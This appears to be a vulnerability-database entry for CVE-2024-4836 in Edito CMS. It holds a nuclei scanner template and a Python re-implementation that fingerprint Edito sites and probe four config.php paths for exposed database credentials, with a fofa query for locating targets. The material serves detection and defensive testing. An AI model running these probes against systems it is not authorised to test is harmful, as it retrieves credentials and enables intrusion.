| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2024-4836 | 2 Jul 2024 17:20 | – | circl |
| Edito CMS Security Vulnerability | 2 Jul 2024 00:00 | – | cnnvd |
| CVE-2024-4836 | 2 Jul 2024 08:44 | – | cve |
| CVE-2024-4836 LFI in sites managed by Edito CMS | 2 Jul 2024 08:44 | – | cvelist |
| CVE-2024-4836 | 2 Jul 2024 09:15 | – | nvd |
| PT-2024-33090 · Edito Cms · Edito Cms | 2 Jul 2024 00:00 | – | ptsecurity |
| CVE-2024-4836 LFI in sites managed by Edito CMS | 2 Jul 2024 08:44 | – | vulnrichment |
```yaml
id: CVE-2024-4836

info:
  name: Edito CMS - Sensitive Data Leak
  author: s4e-io
  severity: high
  description: |
    Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.
  impact: |
    Unauthenticated attackers can download configuration files containing sensitive credentials from Edito CMS installations.
  remediation: |
    Update Edito CMS to a version later than 3.25 that secures configuration file access.
  reference:
    - https://cert.pl/en/posts/2024/07/CVE-2024-4836/
    - https://github.com/sleep46/CVE-2024-4836_Check
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4836
  classification:
    epss-score: 0.02629
    epss-percentile: 0.83644
  metadata:
    max-request: 5
    fofa-query: icon_hash="1491301339"
  tags: cve,cve2024,cms,edito,info-leak,vuln

# Request 2 is only sent if request 1 matched (Edito fingerprint found).
flow: http(1) && http(2)

http:
  # Request 1: fingerprint the site; `internal: true` means this match
  # gates the flow but is never reported as a finding on its own.
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body,"content=\"edito", "www.edito.pl")'
          - "status_code==200"
        condition: and
        internal: true

  # Request 2: probe the candidate config file locations (4 requests,
  # plus the fingerprint request, giving max-request: 5). A hit requires
  # BOTH credential variable names in a 200 body, i.e. the PHP source is
  # served rather than executed.
  - method: GET
    path:
      - "{{BaseURL}}/config.php"
      - "{{BaseURL}}/config/config.php"
      - "{{BaseURL}}/include/config.php"
      - "{{BaseURL}}/includes/config.php"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"db_password", "db_username")'
          - "status_code==200"
        condition: and
# digest: 4a0a00473045022015b5e3836da778e68b32b19d362354ec912c9bd489808b40cfa89ddced737ea2022100c7a59fb340c7df39299aa707328f1020224c3ad59b2e716dded37a0969aa0c62:922c64590222798bb761d5b6d8e72950
```
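The template's detection logic, as an added stand-alone example (this is not code from the nuclei template, from Vulners, or from Edito): a Python re-implementation of the `flow: http(1) && http(2)` gate and the two DSL matchers, with the HTTP transport injected as `get(url) -> (status_code, body)` so the logic runs offline. The hostnames `leaky.example`, `patched.example` and `other.example` and their responses are constructed for illustration; `urllib_get` is the real transport for a host you are authorised to test.

```python
# Added example (not from the nuclei template, Vulners, or Edito): a
# stand-alone re-implementation of the template's two-step flow so the
# matching logic can be exercised offline. The transport is injected as
# get(url) -> (status_code, body); the FAKE_SITES responses are constructed.
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# http(1): page must look like Edito (nuclei: contains_any on body, status 200)
FINGERPRINTS = ('content="edito', "www.edito.pl")
# http(2): candidate config locations probed by the template, same order
CONFIG_PATHS = ("/config.php", "/config/config.php",
                "/include/config.php", "/includes/config.php")
# A hit needs BOTH markers (nuclei: contains_all); an executed PHP file that
# returns an empty 200 body therefore does not match.
SECRET_MARKERS = ("db_password", "db_username")


def is_edito(status, body):
    """Matcher for request 1 (internal: gates request 2, never reported)."""
    return status == 200 and any(f in body for f in FINGERPRINTS)


def leaks_config(status, body):
    """Matcher for request 2: raw PHP source exposing credential variables."""
    return status == 200 and all(m in body for m in SECRET_MARKERS)


def check_target(base_url, get):
    """Return the first leaking path, or None. Mirrors `flow: http(1) && http(2)`:
    if the fingerprint fails, no config path is requested at all."""
    status, body = get(base_url)
    if not is_edito(status, body):
        return None
    root = base_url.rstrip("/")
    for path in CONFIG_PATHS:
        status, body = get(root + path)
        if leaks_config(status, body):
            return path
    return None


def urllib_get(url, timeout=10):
    """Real transport, for use only against hosts you are authorised to test."""
    try:
        with urlopen(Request(url, headers={"User-Agent": "cve-2024-4836-check"}),
                     timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")
    except URLError:
        return 0, ""


# Constructed responses (no network) covering the three outcomes.
FAKE_SITES = {
    # Edito site that serves config.php as source: vulnerable
    "https://leaky.example": {
        "/": (200, '<meta name="generator" content="edito CMS">'),
        "/config.php": (200, "<?php\n$db_username = 'edito';\n$db_password = 's3cret';\n"),
    },
    # Edito site where PHP executes config.php: empty body, not a hit
    "https://patched.example": {
        "/": (200, '<a href="https://www.edito.pl">CMS</a>'),
        "/config.php": (200, ""),
        "/includes/config.php": (403, "Forbidden"),
    },
    # Not Edito at all: request 2 is never sent, even though it would "match"
    "https://other.example": {
        "/": (200, "<html>WordPress</html>"),
        "/config.php": (200, "$db_username $db_password"),
    },
}


def fake_get(url):
    """Offline transport that records every request so the flow can be checked."""
    fake_get.requests.append(url)
    for base, pages in FAKE_SITES.items():
        if url == base or url.startswith(base + "/"):
            path = url[len(base):] or "/"
            return pages.get(path, (404, "Not Found"))
    return (0, "")


fake_get.requests = []

if __name__ == "__main__":
    for site in FAKE_SITES:
        print(site, "->", check_target(site, fake_get))
```

Against `patched.example` the checker issues exactly five requests (one fingerprint plus four probes), matching the template's `max-request: 5`, and reports nothing because the executed `config.php` returns an empty body; against `other.example` only the fingerprint request is sent. The false-positive guard worth keeping from the template is the `contains_all` on both variable names: a 200 on `/config.php` alone proves nothing, since a normally deployed PHP config file also answers 200.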